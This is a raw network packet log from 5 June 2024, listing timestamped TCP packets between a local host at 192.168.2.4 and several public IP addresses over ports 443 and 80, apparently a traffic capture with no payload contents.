                                                                                        Jun 5, 2024 03:56:54.884361029 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.884932041 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:54.884964943 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.885114908 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:54.885201931 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.885339975 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:54.885513067 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.885544062 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:54.885601997 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:54.885741949 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:55.571376085 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:55.571835995 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:55.571947098 CEST44349762149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:55.572267056 CEST49762443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:55.577466965 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:55.577523947 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:55.577837944 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:55.578039885 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:55.578058958 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.424401045 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.424493074 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.426295996 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.426304102 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.426614046 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.427527905 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.472512960 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.699914932 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.699987888 CEST44349764149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.700113058 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.700381994 CEST49764443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.703527927 CEST49765443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.703615904 CEST44349765149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:56.703701973 CEST49765443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.703944921 CEST49765443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:56.704014063 CEST44349765149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:57.532622099 CEST4976680192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:57.537615061 CEST8049766208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:57.537734032 CEST4976680192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:57.538047075 CEST4976680192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:57.539037943 CEST44349765149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:57.542917013 CEST49765443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:57.542927980 CEST8049766208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:57.542964935 CEST44349765149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:57.787166119 CEST44349765149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:57.787245035 CEST44349765149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:57.787312984 CEST49765443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:57.788506031 CEST49765443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:58.126766920 CEST8049766208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:58.289534092 CEST4976680192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:56:58.810631990 CEST49767443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:58.810689926 CEST44349767149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:58.810753107 CEST49767443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:58.811155081 CEST49767443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:58.811182976 CEST44349767149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:58.844991922 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:58.845077038 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:58.845180988 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:58.856044054 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:58.856084108 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.450568914 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.450781107 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:59.452574968 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:59.452630043 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.453207970 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.466286898 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:59.512535095 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.590859890 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.590944052 CEST44349768185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.591041088 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:59.593640089 CEST49768443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:56:59.662316084 CEST44349767149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.666269064 CEST49767443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:59.666290045 CEST44349767149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.913306952 CEST44349767149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.913374901 CEST44349767149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:56:59.913459063 CEST49767443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:56:59.913853884 CEST49767443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:00.914966106 CEST49769443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:00.915054083 CEST44349769149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:00.915348053 CEST49769443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:00.915735960 CEST49769443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:00.915822983 CEST44349769149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:01.751945019 CEST44349769149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:01.753365040 CEST49769443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:01.753454924 CEST44349769149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:01.999195099 CEST44349769149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:01.999245882 CEST44349769149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:01.999516964 CEST49769443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:02.000467062 CEST49769443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.010309935 CEST49770443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.010396004 CEST44349770149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:03.010499001 CEST49770443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.010931969 CEST49770443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.011015892 CEST44349770149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:03.691802025 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.691838980 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:03.691903114 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.692394018 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.692405939 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:03.856656075 CEST44349770149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:03.858139992 CEST49770443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:03.858230114 CEST44349770149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.106009960 CEST44349770149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.106079102 CEST44349770149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.106340885 CEST49770443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.106482983 CEST49770443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.536267042 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.536353111 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.537652016 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.537671089 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.537852049 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.538664103 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.584507942 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.806929111 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.806978941 CEST44349771149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.807044029 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.807410002 CEST49771443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.844865084 CEST49772443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.844949007 CEST44349772149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:04.845061064 CEST49772443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.848416090 CEST49772443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:04.848520041 CEST44349772149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.118251085 CEST49773443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:05.118299961 CEST44349773149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.118355036 CEST49773443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:05.118604898 CEST49773443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:05.118621111 CEST44349773149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.691519976 CEST44349772149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.692537069 CEST49772443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:05.692624092 CEST44349772149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.946535110 CEST44349772149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.946594954 CEST44349772149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.946732044 CEST49772443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:05.947524071 CEST49772443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:05.959889889 CEST44349773149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:05.966361046 CEST49773443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:05.966392994 CEST44349773149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:06.211299896 CEST44349773149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:06.211360931 CEST44349773149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:06.211529970 CEST49773443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:06.211755991 CEST49773443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:06.673371077 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:06.678292990 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:06.678442955 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:06.678442955 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:06.683711052 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:06.975276947 CEST49776443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:06.975323915 CEST44349776149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:06.975399971 CEST49776443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:06.975835085 CEST49776443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:06.975850105 CEST44349776149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.338149071 CEST49777443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:07.338232994 CEST44349777149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.338321924 CEST49777443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:07.338697910 CEST49777443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:07.338783979 CEST44349777149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569123030 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569186926 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569195032 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569291115 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:07.569427967 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569436073 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569446087 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569550991 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:07.569550991 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:07.569689035 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569832087 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569839954 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.569977045 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:07.572278023 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:07.573834896 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:07.573865891 CEST44349778185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.574052095 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:07.577795982 CEST8049775216.58.212.132192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.577923059 CEST4977580192.168.2.4216.58.212.132
                                                                                        Jun 5, 2024 03:57:07.602119923 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:07.602138042 CEST44349778185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.834928989 CEST44349776149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:07.836611986 CEST49776443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:07.836623907 CEST44349776149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.085431099 CEST44349776149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.085488081 CEST44349776149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.085556030 CEST49776443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:08.085913897 CEST49776443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:08.184772968 CEST44349777149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.185888052 CEST49777443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:08.185977936 CEST44349777149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.430898905 CEST44349778185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.434501886 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:08.434519053 CEST44349778185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.435976982 CEST44349778185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.436043978 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:08.436084986 CEST44349777149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.436131001 CEST44349777149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.436304092 CEST49777443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:08.436536074 CEST49777443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:08.444355965 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:08.444541931 CEST44349778185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:08.444617033 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:08.445992947 CEST49778443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:09.087553978 CEST49779443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:09.087594986 CEST44349779149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:09.087662935 CEST49779443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:09.087965965 CEST49779443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:09.087980986 CEST44349779149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:09.906120062 CEST49780443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:09.906219959 CEST44349780149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:09.906337976 CEST49780443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:09.906769037 CEST49780443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:09.906817913 CEST44349780149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:09.923748016 CEST44349779149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:09.925106049 CEST49779443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:09.925132990 CEST44349779149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:10.172754049 CEST44349779149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:10.172914982 CEST44349779149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:10.173000097 CEST49779443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:10.173301935 CEST49779443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:10.742496967 CEST44349780149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:10.744752884 CEST49780443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:10.744785070 CEST44349780149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:10.990343094 CEST44349780149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:10.990422010 CEST44349780149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:10.990480900 CEST49780443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:10.990850925 CEST49780443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:11.180648088 CEST49781443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:11.180726051 CEST44349781149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:11.180809975 CEST49781443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:11.181122065 CEST49781443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:11.181153059 CEST44349781149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.024338007 CEST44349781149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.027745962 CEST49781443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:12.027787924 CEST44349781149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.042231083 CEST49782443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:12.042270899 CEST44349782149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.042355061 CEST49782443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:12.042536020 CEST49782443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:12.042551041 CEST44349782149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.280708075 CEST44349781149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.280776978 CEST44349781149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.280955076 CEST49781443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:12.281219006 CEST49781443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:12.879005909 CEST44349782149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:12.880204916 CEST49782443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:12.880255938 CEST44349782149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:13.124239922 CEST44349782149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:13.124325037 CEST44349782149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:13.124378920 CEST49782443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:13.124672890 CEST49782443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:13.312683105 CEST49783443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:13.312769890 CEST44349783149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:13.312885046 CEST49783443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:13.314361095 CEST49783443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:13.314405918 CEST44349783149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.137998104 CEST49784443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:14.138086081 CEST44349784149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.138350010 CEST49784443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:14.138464928 CEST49784443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:14.138494968 CEST44349784149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.153503895 CEST44349783149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.154692888 CEST49783443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:14.154783010 CEST44349783149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.401449919 CEST44349783149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.401755095 CEST44349783149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.401818037 CEST49783443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:14.408190966 CEST49783443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:14.641798019 CEST4978580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:57:14.647003889 CEST8049785208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.647195101 CEST4978580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:57:14.647624969 CEST4978580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:57:14.652618885 CEST8049785208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.980442047 CEST44349784149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.981770039 CEST49784443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:14.981861115 CEST44349784149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:15.230884075 CEST44349784149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:15.230976105 CEST44349784149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:15.231229067 CEST49784443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:15.232150078 CEST49784443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:15.237062931 CEST8049785208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:57:15.289686918 CEST4978580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:57:15.414973974 CEST49786443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:15.415010929 CEST44349786149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:15.415091038 CEST49786443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:15.415405989 CEST49786443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:15.415420055 CEST44349786149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:15.853584051 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:15.853638887 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:15.853739023 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:15.865384102 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:15.865397930 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.243294954 CEST49788443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:16.243338108 CEST44349788149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.243431091 CEST49788443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:16.243693113 CEST49788443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:16.243705034 CEST44349788149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.251779079 CEST44349786149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.253262997 CEST49786443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:16.253309011 CEST44349786149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.468743086 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.468868971 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:16.474390984 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:16.474411964 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.474787951 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.496479988 CEST44349786149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.496885061 CEST44349786149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.496978045 CEST49786443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:16.497169018 CEST49786443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:16.498529911 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:16.540541887 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.626293898 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.626410961 CEST44349787185.199.109.133192.168.2.4
                                                                                        Jun 5, 2024 03:57:16.626471043 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:16.634875059 CEST49787443192.168.2.4185.199.109.133
                                                                                        Jun 5, 2024 03:57:17.046148062 CEST4978580192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:57:17.079617977 CEST44349788149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:17.080764055 CEST49788443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:17.080789089 CEST44349788149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:17.327146053 CEST44349788149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:17.327220917 CEST44349788149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:17.327281952 CEST49788443192.168.2.4149.154.167.220
